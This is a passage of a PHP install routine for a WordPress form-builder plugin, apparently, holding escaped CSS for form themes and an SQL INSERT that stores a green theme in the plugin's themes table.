{\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/01/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #A0CBDB;\r\n	padding:15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #006A91;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\ncolor: #3F3F3F;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #026994;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #006A91;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #01B4F6;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018ABE;\r\n	background: -moz-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0079A6), color-stop(39%, #018ABE ), color-stop(100%, #00B6FA ));\r\n	background: -webkit-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -o-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -ms-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: linear-gradient(to right, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #C4D5DF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 05 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #007326;\r\nborder: 1px solid #B6E4CF;\r\nmargin-bottom: 10px;\r\ncolor: #B6E4CF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/02/nextbg_hover.png) url([SITE_ROOT]/images/05/02/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/02/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #B6E4CF;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 0px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break{\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: 